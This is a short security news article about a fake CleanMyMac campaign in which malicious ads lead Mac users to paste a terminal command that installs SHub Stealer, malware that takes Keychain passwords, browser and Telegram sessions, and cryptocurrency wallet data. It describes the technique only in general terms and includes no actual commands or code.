Cybercriminals have started targeting Mac users in a fake CleanMyMac campaign that distributes advanced malware that can steal cryptocurrency. Macs used to tout themselves as the safer option compared to Windows, and to an extent, that was true, but not because macOS was somehow fortified or built better, but rather because it was much more niche. While Macs do have features and functions that can, in fact, put them ahead of Windows, they can still be just as vulnerable to malware and other types of attacks.
How It Works
Malwarebytes was the first to break the news after discovering the malicious campaign online. The threat actors have set up fake CleanMyMac websites that mimic the original, trusted software’s site. These websites are then distributed, primarily through malicious ad campaigns. To install the software, the website instructs users to open the terminal and paste a provided command.
Once a user runs the provided command, the malware installs itself using a technique called ClickFixing, which is commonly used by similar malware targeting Macs. The terminal command makes it appear as if the software is being downloaded from a trusted source, when in reality, it’s decoding an encoded link to the real destination. This link then pulls and executes a shell script directly from the attacker’s servers. For the user, it may not seem like much is happening, when in fact, their system has been infected.
What Can It Do?
The malware, called SHub Stealer, automatically detects and steals a wide range of valuable information. This includes Apple Keychain data, which contains all passwords, browser data along with sessions, Telegram sessions, and, most importantly, wallet files and ledgers containing any recovery seeds or phrases. SHub performs systematic sweeps of an infected machine, searching for all valuable data or anything that could be useful to the attackers.
Excluding Russians
Before the malware installs its malicious payload, it runs a check to see if the system has a Russian-language or keyboard layout installed. If it does, the malware sends a "cis_blocked" event to the attackers' servers and kills the process. Reportedly, this tactic is commonly employed by Russian-speaking cybercriminal groups to avoid attracting law enforcement attention in the region.
Conclusion
Unfortunately, it feels like we’re living in an era where malware is just as prevalent as it was in the early 2000s. Big tech corporations often employ poor vetting processes, resulting in malware appearing at the top of major search engine results, unknowingly infecting all sorts of users through this and other similar campaigns. This event also puts a nail in the coffin for the illusion that some people still held—that Macs are the safer alternative, leading them to be more negligent with their security as a result.
0 Comments